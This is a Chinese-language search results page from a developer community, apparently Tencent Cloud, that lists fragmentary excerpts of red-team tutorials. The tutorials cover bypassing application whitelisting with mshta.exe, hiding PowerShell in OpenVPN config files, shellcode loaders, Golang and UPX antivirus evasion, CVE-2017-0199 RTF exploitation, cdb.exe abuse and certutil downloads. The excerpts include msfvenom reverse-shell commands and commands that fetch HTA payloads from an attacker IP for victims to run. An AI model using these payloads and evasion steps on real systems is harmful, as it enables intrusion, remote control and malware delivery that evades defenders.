首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用mshta.exe绕过应用程序白名单

该模块托管一个HTML应用程序(HTA),该应用程序在打开将通过Powershell运行有效负载。当用户导航到HTA文件,IE将在执行有效负载之前两次提示它们。...当hta由mshta.exe启动,它使用已签名的Microsoft二进制文件,使您可以调用PowerShell并将有效负载直接注入内存。 执行以上命令后,您将打开一个会话。...键入3后按Enter键,该过程将开始,您将拥有处理程序(multi / handler) 现在,将您的恶意IP转换为位链接,当您与受害者共享此链接,这些链接对受害者将更真实。...您可以从这里下载 下载并运行后,键入以下命令以访问模块: use Bypass 现在查看有效负载列表: list 现在,从有效负载列表中,您可以选择任何人进行所需的攻击。...生成shellcode,它将要求您提供有效负载的名称。默认情况下,它将以“有效载荷”作为名称。因为我不想给任何名字,所以我只按Enter键。 现在,它制作了两个文件

81230
您找到你想要的搜索结果了吗?
是的
没有找到

安全技术|利用OpenV**配置文件反制的武器化探索

此处应有图, 并没有。...02 Win 本以为win的比较好做,毕竟原文已经给出了调用powershell的poc了,...先看看原文的调用 up 'C:\\Windows\\System32\\cmd.exe /c (start...powershell /w hidden /enc %k0%%k1%%k2%%k3%)"' 先拿去试了一试,可以成功执行,hidden参数并不起作用,powershell的窗口一闪而过 直接在cmd...终端甚至WebShell下通过cmd /c 调用的powershell加上hidden参数是不应该有任何闪窗的 然后意识到这里用了start来启一个进程,这与以下的命令虽然像,效果可不同, 果然是调用方式问题...  替换到powershell模板里,然后python3 -m http.server 80  将下载的url转为base64, 切割成四段, 隐藏到配置文件中...

77620

红队基本操作:通用Shellcode加载器

使用both staged的payload,shellcode会更小,从而导致启动程序二进制文件更小。...上图演示了如何使用msfvenom生成原始shellcode。我们指定payload连接的IP和端口,并将输出保存到文件中。处理大文件,该head命令只能用于打印第一个字符。...当前,源模板文件的路径被硬编码到python脚本中,但是可以很容易地对其进行修改,以允许用户使用该argparse库不同的模板之间进行选择。...由于shellcode是未加密地嵌入二进制文件中的,因此防御者将能够不执行启动程序二进制文件的情况下检测到恶意负载。 ?...对蓝色团队成员有用的注释是,即使payload嵌入发射器二进制文件之前已被加密;通过调试器中逐步执行,仍可以储未加密的payload。

2.7K10

使用mshta.exe绕过应用程序白名单(多种方法)

此模块承载一个HTML应用程序(HTA),打开将通过PowerShell运行有效负载。当用户打开HTA文件,IE会在执行exploit之前提示用户两次。...创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC: python -m SimpleHTTPServer 80 输入以下命令运行上述文件: mshta.exe http:192.168.1.109.../shell.hta 同时,受害者的命令提示符中运行上述文件,启动handler以接收会话。...当我们添加了代码,让我们通过键输入以下内容受害者的PC中执行该文件: mshta.exe http://192.168.1.109/CACTUSTORCH.hta 同时,启动multi/handler...一个资源文件和另一个hta文件 现在,首先,/usr/share/greatsct输出中输入以下命令启动python的服务器: python -m SimpleHTTPServer 80 现在在受害者

1.5K20

使用Golang免杀Tips

这一切始于遇到用Golang编写的Github存储库,该存储库执行时会将shellcode注入正在运行的进程中. https://github.com/brimstone/go-shellcode...通过简单地使用msfvenom生成有效负载,我们对其进行了测试,发现Windows Defender可以轻松检测到该有效负载.Meterpreter有效负载生成如下: msfvenom -p Windows...Windows Defender立即检测到没有UPX压缩的.exe包含Meterpreter有效负载. 但是,运行自定义UPX压缩的.exe文件成功,并且实现了反向Shell ?...成功运行UPX压缩的Go exe文件,并且受害者的计算机上获得了反向外壳. 让我们针对VT运行它,以检查其免杀能力. ?...只有两个防病毒引擎文件中发现有恶意负载,并且两个都没有指定上载到底是恶意的,只是它是恶意的.UPX压缩可能是触发警报的原因,因为UPX压缩可用于混淆恶意文件. ?

2.7K30

使用Golang绕过AV

这一切始于遇到用Golang编写的Github存储库,该存储库执行时会将shellcode注入正在运行的进程中. https://github.com/brimstone/go-shellcode...通过简单地使用msfvenom生成有效负载,我们对其进行了测试,发现Windows Defender可以轻松检测到该有效负载.Meterpreter有效负载生成如下: msfvenom -p Windows...Windows Defender立即检测到没有UPX压缩的.exe包含Meterpreter有效负载....但是,运行自定义UPX压缩的.exe文件成功,并且实现了反向Shell 成功运行UPX压缩的Go exe文件,并且受害者的计算机上获得了反向外壳....只有两个防病毒引擎文件中发现有恶意负载,并且两个都没有指定上载到底是恶意的,只是它是恶意的.UPX压缩可能是触发警报的原因,因为UPX压缩可用于混淆恶意文件.

1.3K20

动态加载 ShellCode绕过杀软

如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?...-o lyshark.exe 上方的代码就可以生成一个lyshark.exe的可执行文件,将此文件上传到VirusTotal,发现它会被大量反病毒引擎所查杀,这是正常的,因为它是一个常见的Payload...此外,当从远程位置以ASCII格式加载ShellCode,需要执行额外步骤,要将指令转换为准备执行的原始二进制格式,这里的get_shellcode()并没有填充完整。...本次杀毒,你会发现误报全部消失了,因为可执行文件中并没有恶意的ShellCode,并且也没有添加任何的下载函数,如果添加了下载函数,此种方法生成的后门依然会存在误报。...PAGE_EXECUTE_READWRITE); memcpy(exec, value, code_length / 2); ((void(*)())exec)(); WSACleanup(); return 0; } 最终的有效负载成功地向侦听主机发送了反向

75920

pyinstaller打包单文件–uac-admin选项不起作用怎么办

使用pyinstaller能很方便的将python脚本打包成单个exe文件。 但是最近有一个需求,打包出来的exe文件需要用管理员权限执行!...也就是双击exe文件运行时,需要弹出一个uac界面让用户授权。 于是我查找pyinstaller的官方文档,说是在打包加上--uac-admin参数就行了!...然而我实际操作了一下,发现直接加上这个参数仅在打包成多文件有效 ,打包成单文件是没用的。 但是我就想打包成单个exe文件,又要uac用户授权界面,怎么办?...我们打包是有加--uac-admin这个参数的,但是在打包出来的exe文件上却没有看到uac的小盾牌图标!...到此这篇关于pyinstaller打包单文件–uac-admin选项不起作用怎么办的文章就介绍到这了,更多相关pyinstaller –uac-admin内容请搜索ZaLou.Cn以前的文章或继续浏览下面的相关文章希望大家以后多多支持

1.2K40

CVE-2017-0199:Microsoft Office RTF 漏洞利用指南

当用户打开文档,winword.exe将会向远程服务器发出HTTP请求,以索取恶意HTA文件。 3. 服务器返回的文件是一个带有嵌入式恶意脚本的假RTF文件。 4....将innocent.doc和server.py两个文件放置攻击机上并开启Apache服务 漏洞利用步骤一:制作恶意RTF文件 新建一个Word文档按照下图进行配置 ? 另存为RTF格式 ?...使用文本编辑器软件打开test.rtf文件文件中查找objupdate,然后objautlink后面插入objupdate ?...漏洞利用步骤二:配置攻击机 使用msfvenom生成反弹shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT...=4444 -f exe > shell.exe 运行server.py服务 python server.py 80 http://10.10.10.104/shell.exe /var/www/html

2.1K110

fsi.exe和cdb.exe白名单的利用

0x01 fsi.exe白名单的利用 fsi.exe、fsianycpu.exe是FSharp解释器,这些具有Microsoft签名的二进制文件包含在Visual Studio中,可用于命令行下直接执行...安装Visual Studio这两个文件并没有被添加至环境变量中,所以需要填写绝对路径或者切换到这个目录下才能执行,路径中带有空格还要用“”双引号给括起来。...白名单的利用 cdb.exe是Windows调试工具(Debugging Tools)附带的一个具有Microsoft签名的二进制文件,可以调试指定进程,且指定进程里分配RWX属性内存并写入shellcode...接着再将提取出来的shellcode拷贝到shellcode2wds.py脚本中的buf处,使用python执行这个脚本进行进一步处理,最终生成出执行上线需要用到的shellcode.wds,py脚本可见文末...将cdb.exe白名单和刚生成的shellcode.wds一起上传至目标主机的可读写目录中,然后中国菜刀的虚拟终端执行以下命令后即可得到反弹cmdshell,如遇360只需加上cmd /c就能绕过。

86920

针对黑客的Windows文件传输总结

使用 Python 的一个好处是它可以终端窗口中记录 HTTP 服务器上的活动。这使您可以确认文件已下载。或者,如果您发现了盲 RCE 漏洞并需要确认其是否有效,也可以使用此方法。...Certutil 的主要功能是储和显示证书颁发机构 (CA) 配置信息。但是,当使用-f、-split和-urlcache开关,您可以从任何 URL 下载任何文件!...有时我尝试使用 cmd.exe 方法从 FTP 下载文件失败。随后,使用 ascii 编码测试 PowerShell 版本,它起作用了。...您还可以使用 msfvenom 制作 meterpreter 负载,然后将其传输给受害者,从常规 shell 升级到 meterpreter shell。...一旦有效负载位于受害者上,启动多处理程序侦听器,然后执行有效负载,您将在多处理程序上拥有一个 meterpreter shell。

38111
领券